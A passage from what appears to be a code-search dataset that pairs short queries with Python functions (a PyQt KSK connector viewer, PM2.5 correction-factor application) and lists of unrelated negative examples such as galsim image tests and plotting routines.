im_test = galsim.ImageD(b, init_value=0)\n for i in range(17):\n for j in range(23):\n val = np.exp(i/7.3) + (j/12.9)**3 # Something randomly complicated...\n im[i,j] = val\n # Find the location in the sub-image for this point.\n ii = (i-b.xmin) % (b.xmax-b.xmin+1) + b.xmin\n jj = (j-b.ymin) % (b.ymax-b.ymin+1) + b.ymin\n im_test.addValue(ii,jj,val)\n im_wrap = im.wrap(b)\n np.testing.assert_almost_equal(im_wrap.array, im_test.array, 12,\n \"image.wrap(%s) did not match expectation\"%b)\n np.testing.assert_array_equal(im_wrap.array, im[b].array,\n \"image.wrap(%s) did not return the right subimage\")\n np.testing.assert_equal(im_wrap.bounds, b,\n \"image.wrap(%s) does not have the correct bounds\")\n\n # For complex images (in particular k-space images), we often want the image to be implicitly\n # Hermitian, so we only need to keep around half of it.\n M = 38\n N = 25\n K = 8\n L = 5\n im = galsim.ImageCD(2*M+1, 2*N+1, xmin=-M, ymin=-N) # Explicitly Hermitian\n im2 = galsim.ImageCD(2*M+1, N+1, xmin=-M, ymin=0) # Implicitly Hermitian across y axis\n im3 = galsim.ImageCD(M+1, 2*N+1, xmin=0, ymin=-N) # Implicitly Hermitian across x axis\n #print('im = ',im)\n #print('im2 = ',im2)\n #print('im3 = ',im3)\n b = galsim.BoundsI(-K+1,K,-L+1,L)\n b2 = galsim.BoundsI(-K+1,K,0,L)\n b3 = galsim.BoundsI(0,K,-L+1,L)\n im_test = galsim.ImageCD(b, init_value=0)\n for i in range(-M,M+1):\n for j in range(-N,N+1):\n # An arbitrary, complicated Hermitian function.\n val = np.exp((i/(2.3*M))**2 + 1j*(2.8*i-1.3*j)) + ((2 + 3j*j)/(1.9*N))**3\n #val = 2*(i-j)**2 + 3j*(i+j)\n\n im[i,j] = val\n if j >= 0:\n im2[i,j] = val\n if i >= 0:\n im3[i,j] = val\n\n ii = (i-b.xmin) % (b.xmax-b.xmin+1) + b.xmin\n jj = (j-b.ymin) % (b.ymax-b.ymin+1) + b.ymin\n im_test.addValue(ii,jj,val)\n #print(\"im = \",im.array)\n\n # Confirm that the image is Hermitian.\n for i in range(-M,M+1):\n for j in range(-N,N+1):\n assert im(i,j) == im(-i,-j).conjugate()\n\n im_wrap = im.wrap(b)\n #print(\"im_wrap = \",im_wrap.array)\n 
np.testing.assert_almost_equal(im_wrap.array, im_test.array, 12,\n \"image.wrap(%s) did not match expectation\"%b)\n np.testing.assert_array_equal(im_wrap.array, im[b].array,\n \"image.wrap(%s) did not return the right subimage\")\n np.testing.assert_equal(im_wrap.bounds, b,\n \"image.wrap(%s) does not have the correct bounds\")\n\n im2_wrap = im2.wrap(b2, hermitian='y')\n #print('im_test = ',im_test[b2].array)\n #print('im2_wrap = ',im2_wrap.array)\n #print('diff = ',im2_wrap.array-im_test[b2].array)\n np.testing.assert_almost_equal(im2_wrap.array, im_test[b2].array, 12,\n \"image.wrap(%s) did not match expectation\"%b)\n np.testing.assert_array_equal(im2_wrap.array, im2[b2].array,\n \"image.wrap(%s) did not return the right subimage\")\n np.testing.assert_equal(im2_wrap.bounds, b2,\n \"image.wrap(%s) does not have the correct bounds\")\n\n im3_wrap = im3.wrap(b3, hermitian='x')\n #print('im_test = ',im_test[b3].array)\n #print('im3_wrap = ',im3_wrap.array)\n #print('diff = ',im3_wrap.array-im_test[b3].array)\n np.testing.assert_almost_equal(im3_wrap.array, im_test[b3].array, 12,\n \"image.wrap(%s) did not match expectation\"%b)\n np.testing.assert_array_equal(im3_wrap.array, im3[b3].array,\n \"image.wrap(%s) did not return the right subimage\")\n np.testing.assert_equal(im3_wrap.bounds, b3,\n \"image.wrap(%s) does not have the correct bounds\")\n\n b = galsim.BoundsI(-K+1,K,-L+1,L)\n b2 = galsim.BoundsI(-K+1,K,0,L)\n b3 = galsim.BoundsI(0,K,-L+1,L)\n assert_raises(TypeError, im.wrap, bounds=None)\n assert_raises(ValueError, im3.wrap, b, hermitian='x')\n assert_raises(ValueError, im3.wrap, b2, hermitian='x')\n assert_raises(ValueError, im.wrap, b3, hermitian='x')\n assert_raises(ValueError, im2.wrap, b, hermitian='y')\n assert_raises(ValueError, im2.wrap, b3, hermitian='y')\n assert_raises(ValueError, im.wrap, b2, hermitian='y')\n assert_raises(ValueError, im.wrap, b, hermitian='invalid')\n assert_raises(ValueError, im2.wrap, b2, hermitian='invalid')\n assert_raises(ValueError, im3.wrap, b3, hermitian='invalid')",
"def test_underline_characters_in_section(self):\n self.assertContains('enwiki_help_editing', 'Talk_(discussion)_pages',\n 'Understood by mediawiki')",
"def testCompoundCenter(self):\n\n def cylinders(self, radius, height):\n\n c = Solid.makeCylinder(radius, height, Vector())\n\n # Combine all the cylinders into a single compound\n r = self.eachpoint(lambda loc: c.located(loc), True).combineSolids()\n\n return r\n\n Workplane.cyl = cylinders\n\n # Now test. here we want weird workplane to see if the objects are transformed right\n s = (\n Workplane(\"XY\")\n .rect(2.0, 3.0, forConstruction=True)\n .vertices()\n .cyl(0.25, 0.5)\n )\n\n self.assertEqual(4, len(s.val().Solids()))\n self.assertTupleAlmostEquals((0.0, 0.0, 0.25), s.val().Center().toTuple(), 3)",
"def nest(self, a, b):\n # Split string for injection\n midpoint = int(len(b) / 2)\n # Inject a pair of parentheses\n #print(\"{}{}{}\".format(b[:midpoint], a, b[midpoint:]))\n return \"{}{}{}\".format(b[:midpoint], a, b[midpoint:])",
"def round_end(self, hooker):\r\n pass",
"def test_merge_normal_text_collapsable_whitespaces():\n b = Block(0, Prefix())\n b.merge_normal_text(\"Hallo\")\n assert b._content == 'Hallo'\n assert not b.collapsable_whitespace\n\n b = Block(0, Prefix())\n b.merge_normal_text(\" Hallo \")\n assert b._content == 'Hallo '\n assert b.collapsable_whitespace\n\n b = Block(0, Prefix())\n b.merge_normal_text('')\n assert b._content == ''\n assert b.collapsable_whitespace\n\n b.merge_normal_text(' ')\n assert b._content == ''\n assert b.collapsable_whitespace\n\n b.merge_normal_text(' ')\n assert b._content == ''\n assert b.collapsable_whitespace",
"def test_after_space():\n print('Testing after_space')\n result = currency.after_space(' ')\n introcs.assert_equals(' ', result)\n result = currency.after_space('Nicholas ')\n introcs.assert_equals('', result)\n result = currency.after_space('Nich olas')\n introcs.assert_equals('olas', result)\n result = currency.after_space(' Nicholas')\n introcs.assert_equals('Nicholas', result)\n result = currency.after_space('N i c h o l a s')\n introcs.assert_equals('i c h o l a s', result)",
"def test_tag_runs(self):\n pass"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Show the image of each connector of a KSK
|
def show_KSK_images(self, index: int = None):
KSK_name = ""
if type(index) == int and 0 <= index < self.list_widget.count():
KSK_name = self.list_widget.item(index).text()
self.list_widget.selectedItems().clear()
self.list_widget.setCurrentRow(index)
else:
KSK_name = self.list_widget.selectedItems()[0].text()
get_KSK(KSK_name)
connectors_gb = self.createParentGroup(f"Connectors Of {KSK_name}")
connectors_gb.setStyleSheet("font-size: 22px")
self.main_grid.addWidget(connectors_gb, 0, 2, 9, 4)
next_btn = QPushButton(connectors_gb)
next_btn.setGeometry(980, 290, 70, 40)
MyIcon2 = QPixmap('input/images/next.png')
next_btn.setIcon(QIcon(MyIcon2))
next_btn.setIconSize(QSize(100, 40))
next_btn.setToolTip('next')
next_btn.setStyleSheet("background-color :#fbeec1;color:#fbeec1")
next_btn.clicked.connect(lambda: self.show_KSK_images(
self.list_widget.selectedIndexes()[0].row() + 1))
previous_btn = QPushButton(connectors_gb)
previous_btn.setGeometry(20, 290, 70, 40)
MyIcon = QPixmap('input/images/previous.png')
previous_btn.setIcon(QIcon(MyIcon))
previous_btn.setIconSize(QSize(100, 40))
previous_btn.setToolTip('Previous')
previous_btn.setStyleSheet("background-color :#fbeec1;color:#fbeec1")
previous_btn.clicked.connect(lambda: self.show_KSK_images(
self.list_widget.selectedIndexes()[0].row() - 1))
|
[
"def show(self):\n plt.figure(randint(0, 256))\n plt.imshow(self.image,)\n plt.xticks([]), plt.yticks([])\n plt.show()",
"def plot_pair_img_label(img,label,figsize=(8,4)):\n\n fig=plt.figure(figsize=figsize)\n columns = 2\n rows = 1\n\n\n fig.add_subplot(rows, columns, 1)\n plt_imshow_squeeze_if_channel_eq1(img)\n #plt.imshow(img)\n\n fig.add_subplot(rows, columns, 2)\n plt_imshow_squeeze_if_channel_eq1(label)\n #plt.imshow(label, cmap=plt.cm.gray) \n\n plt.show() \n\n print(\"img,label shape:\", img.shape, label.shape)",
"def display(self):\n self.o.display_image(self.image)",
"def DrawDirectionImage(self):\n #plt.figure(figsize=Settings.FigureSize)\n plt.figure(figsize=(5,5))\n plt.subplot(2,2,1)\n plt.imshow(self.Directions['W'])\n plt.title('Agent looking W,ID:{}'.format(self.ID))\n plt.subplot(2,2,2)\n plt.imshow(self.Directions['E'])\n plt.title('Agent looking E,ID:{}'.format(self.ID))\n plt.subplot(2,2,3)\n plt.imshow(self.Directions['N'])\n plt.title('Agent looking N,ID:{}'.format(self.ID))\n plt.subplot(2,2,4)\n plt.imshow(self.Directions['S'])\n plt.title('Agent looking S,ID:{}'.format(self.ID))",
"def showMatches(img1, img2, kp1xy, kp2xy):\n fig = plt.figure()\n s1 = img1.shape\n s2 = img2.shape\n print s1\n print s2\n step = 0\n plt.imshow(img1, extent=(0, s1[1], 0, s1[0]), origin='lower')\n bx = (s1[1]+step)#*0.7\n by = (s1[0]+step)#*0.7\n plt.imshow(img2, extent=(bx, bx+s2[1], by, by+s2[0]), origin='lower')\n a1 = kp1xy\n a2 = kp2xy.copy()\n a2[:,0] += by\n a2[:,1] += bx\n lines = [[p1[::-1], p2[::-1]] for p1, p2 in zip(a1, a2)]\n cmap = cm.prism\n cmap = cm.spring\n cs = cmap(n.linspace(0, 1, len(lines)))\n lc = mc.LineCollection(lines, linewidths=1, colors=cs)\n ax = fig.gca()\n ax.add_collection(lc)\n ax.set_xlim([0, s1[1]+step+s2[1]])\n ax.set_ylim([0, s1[0]+step+s2[0]])",
"def lines(self):\r\n w, h = self.width, self.height # create local shortcut for image size\r\n board = ImageDraw.Draw(self.board) # create interactive image (for drawing)\r\n for loop in range(8): # draw 8 pairs of random lines on image\r\n xa, ya, xb, yb = rr(w), rr(h), rr(w), rr(h) # select random coordinates\r\n board.line((xa, 0, xb, h), width=2, fill='#000') # line from top to bottom\r\n board.line((0, ya, w, yb), width=2, fill='#000') # line from left to right\r\n self.label['image'] = self.image = ImageTk.PhotoImage(self.board) # update\r",
"def show_image(self):\n if self.image_id:\n self.canvas.delete(self.image_id)\n\n width, height = self.image.size\n cw = self.canvas.winfo_width()\n ch = self.canvas.winfo_height()\n\n nw = int(width * self.scale_range[self.scale_idx])\n nh = int(height * self.scale_range[self.scale_idx])\n self.imagetk = ImageTk.PhotoImage(\n self.image.resize( (nw, nh), Image.ANTIALIAS )\n )\n\n ow = (cw - nw) / 2 if nw < cw else 0\n oh = (ch - nh) / 2 if nh < ch else 0\n\n self.image_id = self.canvas.create_image(ow , oh, image=self.imagetk, anchor='nw')\n self.canvas.configure(scrollregion=self.canvas.bbox('all'))",
"def show_img(self, size, depth): # mostra imagem a partir do algoritimo de\n imagem_branco = self.generate_baseimage(size)\n print(\"imagem_branco\")\n list_triangles = self.create_depths_from_triangle(self.get_triangle_from_square(square.create_from_size(size)),\n depth)\n print(\"lista gerada\")\n imagem = self.draw_all_triangles_from_list( imagem_branco, list_triangles)\n print(\"imagem pronta\")\n cv2.imshow(\"test\", imagem) # testing\n cv2.waitKey()",
"def plotCloudImage(self):\n from pImagePlots import PImagePlots\n import pylab\n im = PImagePlots()\n im.setImage(self.cloudimage)\n im.showImage(copy=True)\n im.hanningFilter()\n im.calcAll()\n im.showPsd2d()\n im.showAcovf2d()\n im.showAcovf1d()\n im.showSf(linear=True)\n #pylab.show()\n return",
"def generate_image(self) -> None:",
"def view_image(row, train_test):\n\n image_name, l, t, r, b, class_idx = row\n class_name = car_dict[class_idx]\n drawn_img = Image.open(\n Path(\"stanford_car\")\n / \"car_data\"\n / train_test\n / class_name\n / image_name\n )\n bbox = ImageDraw.Draw(drawn_img)\n bbox.rectangle([l, t, r, b], outline=\"red\", fill=None)\n drawn_img.show()",
"def plot_kernels(K_collection, K_extract, fname):\n\n\tfig, ax = plt.subplots(1, figsize=(10, 5))\n\tfor i in range(len(K_collection)):\n\t\tax.plot(K_collection[i], c=\"red\", lw=0.5) \n\tax.plot(K_extract, c=\"blue\", lw=1.5)\n\tax.set_ylim([-0.03, 0.3])\n\tax.axhline(y=0, c=\"black\", ls=\"--\", lw=1.)\n\tplt.savefig(fname, dpi=200, bbox_inches=\"tight\")\n# plt.show()\n\tplt.close()\n\n\treturn",
"def _display_iteration(self, X, nearest_idx):\n if self.vis_dims == 0:\n return\n\n points = X.copy()\n centroids = self.centroids.copy()\n\n data_components = points.shape[1]\n if data_components > self.vis_dims:\n pca = PCA(n_components=self.vis_dims)\n points = pca.fit_transform(points)\n centroids = pca.transform(centroids)\n\n f = plt.figure(figsize=(4, 4))\n plt.title(f'Clustering {self.name} data with K={self.K}')\n\n # Visualization for 3D\n if self.vis_dims == 3:\n ax = Axes3D(f)\n for k in range(self.K):\n # Plot centroid k\n ax.scatter(xs=centroids[k, 0],\n ys=centroids[k, 1],\n zs=centroids[k, 2],\n c=[self.colors[k]], s=150,\n marker='*', edgecolors='black', zorder=2)\n\n # Plot points associated with cluster k\n ax.scatter(xs=points[nearest_idx[k], 0],\n ys=points[nearest_idx[k], 1],\n zs=points[nearest_idx[k], 2],\n c=[self.colors[k]], s=10, alpha=0.5, zorder=1)\n\n # Visualization for 2D\n else:\n for k in range(self.K):\n # Plot centroid k\n plt.scatter(x=centroids[k, 0],\n y=centroids[k, 1],\n c=[self.colors[k]], s=150,\n marker='*', edgecolors='black', zorder=2)\n\n # Plot points associated with cluster k\n plt.scatter(x=points[nearest_idx[k], 0],\n y=points[nearest_idx[k], 1],\n c=[self.colors[k]], s=10, alpha=0.5, zorder=1)\n\n if self.fig_save_path is None:\n plt.show()\n else:\n directory = os.path.join(self.fig_save_path, self.__class__.__name__)\n if not os.path.exists(directory):\n os.mkdir(directory)\n plt.savefig(os.path.join(directory, f'{self.name}_K{self.K}_{self.it}.png'))\n plt.close()",
"def show_batch(dataLoader, rows):\n for images, labels in dataLoader:\n _, ax = plt.subplots(figsize=(12, 12))\n ax.set_xticks([])\n ax.set_yticks([])\n ax.imshow(make_grid(images[:64], nrow=rows).permute(1, 2, 0))\n print(labels)\n break",
"def show_image(img, label, indice=-1):\n\tif indice ==-1:\n\t\tindice = img.shape[1]//2\n\n\tN = label.shape[0]\n\tfig, ax = plt.subplots(1, N+1, figsize=(12, 4), sharey=True)\n\tax[0].imshow(img[0][indice], cmap='gray')\n\t# have to show the original image\n\n\tfor i in range(N):\n\t\tax[i+1].imshow(label[i][indice], cmap='gray')\n\tplt.show()\n\n\tpass",
"def visualizeQuakes(k, r):\r\n eq_dict = readeqf()\r\n centroids = createCentroids(k, eq_dict)\r\n clusters = createClusters(k, centroids, eq_dict, r)\r\n\r\n w = 1800 #Window width.\r\n h = 900 #Window height.\r\n bg_pic = \"better_worldmap1800_900.gif\"\r\n\r\n t.setup(width=w, height=h)\r\n t.bgpic(bg_pic)\r\n t.speed(\"fastest\")\r\n t.hideturtle()\r\n t.up()\r\n\r\n w_factor = ((w / 2) / 180)\r\n h_factor = ((h / 2) / 90)\r\n\r\n color_list = [\"dark red\", \"dark green\", \"dark blue\", \"dark orange\",\r\n \"dark orchid\", \"dark goldenrod\", \"dark violet\",\r\n \"pink\", \"magenta\", \"sky blue\", \"plum\", \"dark salmon\",\r\n \"goldenrod\", \"chartreuse\", \"dark sea green\", \"cornsilk\",\r\n \"dark olive green\", \"bisque\", \"blanched almond\",\r\n \"dark cyan\", \"royal blue\", \"papaya whip\", \"peach puff\",\r\n \"misty rose\", \"mint cream\", \"lavender blush\", \"hot pink\",\r\n \"dark khaki\", \"cornflower blue\", \"chocolate\"]\r\n\r\n for cluster_index in range(k):\r\n t.color(color_list[cluster_index])\r\n for akey in clusters[cluster_index]:\r\n lon = (eq_dict[akey][0]) * w_factor\r\n lat = (eq_dict[akey][1]) * h_factor\r\n t.goto(lon, lat)\r\n t.dot()\r\n return None",
"def drawKeypoints_Array(img0,pts):\n f,ax2 = plt.subplots(1, 1)\n cols = pts[:,0]\n rows = pts[:,1]\n ax2.imshow(cv2.cvtColor(img0, cv2.COLOR_BGR2RGB))\n ax2.scatter(cols, rows)\n plt.show()",
"def _plot_one_shelf(layout, shelf_length=48, shelf_height=10, scale=10, image_folder='/Users/matthew.mu/dat/images'):\n result = layout\n\n nl = len(result)\n\n # plot shelf\n im = Image.new('RGB', [shelf_length*scale, nl*shelf_height*scale], (211, 211, 211))\n draw = ImageDraw.Draw(im)\n\n for i in range(nl):\n draw.line((0, shelf_height*scale * i + shelf_height*scale, shelf_length*scale, shelf_height*scale * i + shelf_height*scale),\n fill=(0, 0, 0), width=2)\n\n # result to display\n colors = ['blue', 'green', 'red', 'yellow', 'black', 'brown']\n\n sku_list = list(set([item for sl in [result[i]['skus'] for i in range(len(result))] for item in sl]))\n sku_color_dict = dict({sku_list[i]: colors[i % len(colors)] for i in range(len(sku_list))})\n\n for layer in range(len(result)):\n\n result_layer = result[layer]\n n = result_layer['n']\n skus = result_layer['skus']\n x = result_layer['x']\n y = result_layer['y']\n for i in range(len(n)):\n if n[i] > 0 and y[i] - x[i] > 0:\n sku_length = (y[i] - x[i]) / n[i]\n try:\n pil_im = Image.open(os.path.join(image_folder, skus[i] + '.jpg'))\n except:\n pil_im = Image.new('RGB', (100, 200), (211, 211, 211))\n dr = ImageDraw.Draw(pil_im)\n dr.rectangle(((10, 10), (90, 190)), outline=sku_color_dict[skus[i]])\n dr.text((15, 15), f\"{skus[i]}\", fill=\"black\")\n\n prod_im = _trim(pil_im).resize((round(sku_length * scale), shelf_height*scale), Image.ANTIALIAS)\n x_ = x[i]\n for j in range(n[i]): # n[i] times\n im.paste(prod_im, (round(x_ * scale), shelf_height*scale * layer))\n x_ += sku_length\n\n return im",
"def show(self):\n fig, ax = plt.subplots(1, 1)\n image = ImageShower(ax, self.image)\n fig.canvas.mpl_connect('scroll_event', image.onscroll)\n plt.show()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Fill the KSK list widget with KSK names
|
def fill_KSK_list_widget(self):
    # Refresh the KSK list widget from the current search query.
    self.list_widget.clear()
    search_query = self.search_box.text()
    KSK_names, dates = search_for_KSK(search_query)
    # Populate the date-filter combo box only once; on later calls just reset it.
    if self.cb.count() == 0:
        self.cb.addItem('Filter by date')
        self.cb.addItems(sorted(dates))  # dict keys are already unique; sort for a stable order
    else:
        self.cb.setCurrentIndex(0)
    self.list_widget.addItems(KSK_names)
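# Editor's note (hedged assumption): search_for_KSK is defined elsewhere and is taken to
# return a list of KSK names plus a dict keyed by date strings; only those date keys are
# used to build the filter combo box above.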
|
[
"def _populateEntries(self):\n\n widgets = self.setting.getWidgetList()\n\n # we only need the list of names\n names = list(widgets.keys())\n names.sort()\n\n utils.populateCombo(self, names)",
"def show_KSK_images(self, index: int = None):\r\n KSK_name = \"\"\r\n if type(index) == int and 0 <= index < self.list_widget.count():\r\n KSK_name = self.list_widget.item(index).text()\r\n self.list_widget.selectedItems().clear()\r\n self.list_widget.setCurrentRow(index)\r\n\r\n else:\r\n KSK_name = self.list_widget.selectedItems()[0].text()\r\n\r\n get_KSK(KSK_name)\r\n\r\n connectors_gb = self.createParentGroup(f\"Connectors Of {KSK_name}\")\r\n connectors_gb.setStyleSheet(\"font-size: 22px\")\r\n\r\n self.main_grid.addWidget(connectors_gb, 0, 2, 9, 4)\r\n\r\n next_btn = QPushButton(connectors_gb)\r\n next_btn.setGeometry(980, 290, 70, 40)\r\n MyIcon2 = QPixmap('input/images/next.png')\r\n next_btn.setIcon(QIcon(MyIcon2))\r\n next_btn.setIconSize(QSize(100, 40))\r\n next_btn.setToolTip('next')\r\n next_btn.setStyleSheet(\"background-color :#fbeec1;color:#fbeec1\")\r\n next_btn.clicked.connect(lambda: self.show_KSK_images(\r\n self.list_widget.selectedIndexes()[0].row() + 1))\r\n\r\n previous_btn = QPushButton(connectors_gb)\r\n previous_btn.setGeometry(20, 290, 70, 40)\r\n MyIcon = QPixmap('input/images/previous.png')\r\n previous_btn.setIcon(QIcon(MyIcon))\r\n previous_btn.setIconSize(QSize(100, 40))\r\n previous_btn.setToolTip('Previous')\r\n\r\n previous_btn.setStyleSheet(\"background-color :#fbeec1;color:#fbeec1\")\r\n previous_btn.clicked.connect(lambda: self.show_KSK_images(\r\n self.list_widget.selectedIndexes()[0].row() - 1))",
"def create_labels(self):\n for name in self.names:\n label_name = Label(text=name, id=name)\n self.root.ids.entries_box.add_widget(label_name)",
"def on_dnList_itemSelectionChanged(self):\n self.__updateDefineNameButtons()",
"def lista_listwidget(self):\n\n for item in self.lista:\n self.listwidget.addItem(item)",
"def add_songs_to_listbox(self):\r\n self.listbox.delete(0, END)\r\n for title in self.titles:\r\n self.listbox.insert(END, title)",
"def __init__(self, quickid=None, description=None, value=None,validator=None,list1=[],list2=[], name1=None, name2=None, hideon=None, selection=\"single\"):\n\t\n\tQuickWidget.__init__(self, quickid, description, value, validator, hideon=hideon)\n\n self.value = value or [[item, None] for item in list1]\n\tself.list1 = list1\n\tself.list2 = list2\n self.name1 = name1\n self.name2 = name2 \n self.selection = selection\n\n\tgtk.HBox.__init__(self, False, 0)\n\tself.type=\"ListPair\"\n\n self._createTables()\n\n\tself.pack_start(self.listL,False,5)\n\tself.pack_start(self.listR,False,5)\n\tself._create_entry()\n\tself._create_button()",
"def list_kernels():\n knames, ktypes = [], []\n for typ in [\"spk\", \"fk\", \"tk\", \"pck\", \"lsk\"]:\n for ii in range(spice.ktotal(typ)):\n dat = spice.kdata(ii, typ)\n knames.append(dat[0])\n ktypes.append(dat[1])\n return knames, ktypes",
"def create_labels(self):\n for name in self.names:\n temp_label = Label(text=name)\n self.root.ids.main.add_widget(temp_label)",
"def __populateDefineNamesList(self, definedNames):\n for definedName in definedNames:\n if definedName:\n nameValueList = definedName.split(\"=\")\n name = nameValueList[0].strip()\n if len(nameValueList) > 1:\n value = nameValueList[1].strip()\n else:\n value = \"\"\n QTreeWidgetItem(self.dnList, [name, value])\n \n self.dnList.sortItems(0, Qt.AscendingOrder)",
"def by_kinase_name(self, kinase_names):\n raise NotImplementedError(\"Implement in your subclass!\")",
"def items(self):\n return _NamelistItemsView(self)",
"def loadOfferings(self):\n if self.parent_widget.service and self.parent_widget.service.service_valid:\n self.removeOfferings() # clear current data\n self.contents = self.parent_widget.service.service.__dict__['contents']\n #print \"SOS:401 self.contents\", self.contents\n for content in self.contents:\n item = QtGui.QListWidgetItem(content.id)\n self.lbxOfferings.addItem(item)",
"def inhoud_listbox_aanpassen(lijst):\r\n\t\t\tlistbox_producten.delete(0, \"end\")\r\n\r\n\t\t\tmaximum_lengte_naam = 40\r\n\r\n\t\t\tfor product in lijst:\r\n\t\t\t\tlistbox_producten.insert(\"end\",\r\n\t\t\t\t\t\t\t\t\t\tf\" {product['name'][:maximum_lengte_naam]:{maximum_lengte_naam}}\"\r\n\t\t\t\t\t\t\t\t\t\tf\"{product['release_date']:>16}\"\r\n\t\t\t\t\t\t\t\t\t\tf\"{product['rating']:>29}\"\r\n\t\t\t\t\t\t\t\t\t\tf\"{product['price']:>11.2f}\"\r\n\t\t\t\t\t\t\t\t\t\tf\"€\")",
"def setup_keywords_ui(self, parent, layout):\n keywords = self.names_config.get(\"keywords\", {})\n\n if keywords:\n cats_layout = QtWidgets.QHBoxLayout(parent)\n\n # create category and btn grid for all keywords\n cat_names = keywords.keys()\n for catName in cat_names:\n cat_keywords = keywords[catName]\n cat_layout = self.setupKeywordCategoryUi(parent, catName, cat_keywords)\n cats_layout.addLayout(cat_layout)\n\n layout.addLayout(cats_layout)\n\n else:\n no_names_label = QtWidgets.QLabel(parent)\n no_names_label.setText(\"no keywords\")\n no_names_label.setProperty(\"cssClasses\", \"help\")\n layout.addWidget(no_names_label)",
"def __init__(self, listwidget, lista):\n\n self.listwidget = listwidget # listWidget.\n self.lista = lista # Lista de python",
"def display_grp_words(self):\n index = self.list_grp.selectionModel().currentIndex()\n group_txt = index.sibling(index.row(), 0).data()\n self.list_wrd_in_grp.clear() # clears group words list (right list).\n for word in self.db.get_group_words(group_txt):\n self.list_wrd_in_grp.addItem(word[0])",
"def fillListctrlFromSQL(objListctrl, stSQL, keyCol=0, visibleCol=1):\n objListctrl.DeleteAllItems()\n recs = curD.execute(stSQL).fetchall()\n i=0 # dummy variable, will change with each InsertStringItem\n for rec in recs:\n objListctrl.InsertStringItem(i, rec[visibleCol])\n objListctrl.SetItemData(i, rec[keyCol])",
"def fillListctrlFromSQL(objListctrl, stSQL, keyCol=0, visibleCol=1):\n recs = curD.execute(stSQL).fetchall()\n i=0 # dummy variable, will change with each InsertStringItem\n for rec in recs:\n objListctrl.InsertStringItem(i, rec[visibleCol])\n objListctrl.SetItemData(i, rec[keyCol])"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Apply correction factors (in place) to PM2.5 data in data_list
|
def applyCorrectionFactorsToList(data_list, pm25_key=None):
# Open the file and get correction factors
with open(getenv("CORRECTION_FACTORS_FILENAME")) as csv_file:
read_csv = csv_reader(csv_file, delimiter=',')
rows = [row for row in read_csv]
header = rows[0]
rows = rows[1:]
correction_factors = []
for row in rows:
rowDict = {name: elem for elem, name in zip(row, header)}
rowDict['start_date'] = parseDatetimeString(rowDict['start_date'])
rowDict['end_date'] = parseDatetimeString(rowDict['end_date'])
rowDict['3003_slope'] = float(rowDict['3003_slope'])
rowDict['3003_intercept'] = float(rowDict['3003_intercept'])
correction_factors.append(rowDict)
# Apply the correction factors to the PM2.5 data
for datum in data_list:
try:
datum[pm25_key] = applyCorrectionFactor(correction_factors, datum['Timestamp'], datum[pm25_key])
        except Exception:  # Only try once. We just assume it isn't there if the first row doesn't have it
return data_list
# found = False
# for factor in correction_factors:
# factor_start = factor['start_date']
# factor_end = factor['end_date']
# if factor_start <= datum['Timestamp'] < factor_end:
# datum['PM2_5'] = datum['PM2_5'] * factor['3003_slope'] + factor['3003_intercept']
# found = True
# break
# if not found:
# print('\nNo correction factor found for ', datum['Timestamp'])
return data_list
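# Illustrative usage (editor's sketch, not part of the original module; the exact timestamp
# format accepted by parseDatetimeString is an assumption):
#     data = [{'Timestamp': parseDatetimeString('2021-06-01 12:00:00'), 'PM2_5': 12.3}]
#     data = applyCorrectionFactorsToList(data, pm25_key='PM2_5')
# The CSV named by CORRECTION_FACTORS_FILENAME must provide start_date, end_date,
# 3003_slope and 3003_intercept columns, as read above.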
|
[
"def apply_correction(data):\r\n \r\n \r\n arduinos = data.keys()\r\n \r\n temp_correction = {1: 0.09, 2: 0.10, 3: -0.02, 4: -0.23, 5: -0.20,\r\n 6: 0.05, 7: 0.15, 8: 0.12, 9: -0.10, 10: 0.11,\r\n 11: 0.0}#-0.08}\r\n temp_bias = 0.4896611061095239\r\n \r\n humidity_correction = {1: -0.15, 2: 0.28, 3: -0.09, 4: 0.08, 5: 0.41,\r\n 6: -0.19, 7: -2.16, 8: 1.01, 9: -0.64, 10: -0.35,\r\n 11: 0.0}#2.01}\r\n humidity_bias = 2.7331455153884265\r\n \r\n pressure_correction = {1: -0.478, 2: 1.112, 3: -0.415, 4: -0.861, 5: -0.43,\r\n 6: -0.367, 7: -0.712, 8: -0.257, 9: 0.346, 10: -0.77,\r\n 11: 0.0}\r\n pressure_bias = 1.213813881674857\r\n \r\n for i in arduinos:\r\n # temperature\r\n data[i][1:, 1] = data[i][1:, 1] + temp_correction[i] - temp_bias\r\n # humidity\r\n data[i][1:, 2] = data[i][1:, 2] + humidity_correction[i] - humidity_bias\r\n print(\"Temperature and humidity calibrated\")\r\n\r\n if data[1][1, 0] > date2num(datetime.datetime(2018, 8, 31, 0, 0)):\r\n for i in arduinos:\r\n # pressure\r\n data[i][1:, 3] = data[i][1:, 3] + pressure_correction[i] -pressure_bias\r\n print(\"Pressure calibrated\")\r\n \r\n return data",
"def estimate_factors(self):\n self.apply_transforms()\n self.remove_outliers()\n if self.Nfactor is None:\n self.baing()\n self.factors_em()",
"def _apply_factors(params):\n\n params['Rs'] = params['Rs'] * R_sun\n params['Mp'] = params['Mp'] * M_jup\n params['Rp'] = params['Rp'] * R_jup\n\n return params",
"def scale_list(data, factor):\n assert factor != 0, 'ERROR: Zero-division encountered'\n return [item / factor for item in data]",
"def apply_weights_correction(data, correction):\n out = np.empty_like(data)\n for i in range(out.shape[0]):\n for j in range(out.shape[1]):\n for k in range(out.shape[2]):\n cc = correction[i, j, k]\n c = cc.real**2 + cc.imag**2\n if c > 0: # Will be false if c is NaN\n out[i, j, k] = data[i, j, k] / c\n else:\n out[i, j, k] = 0\n return out",
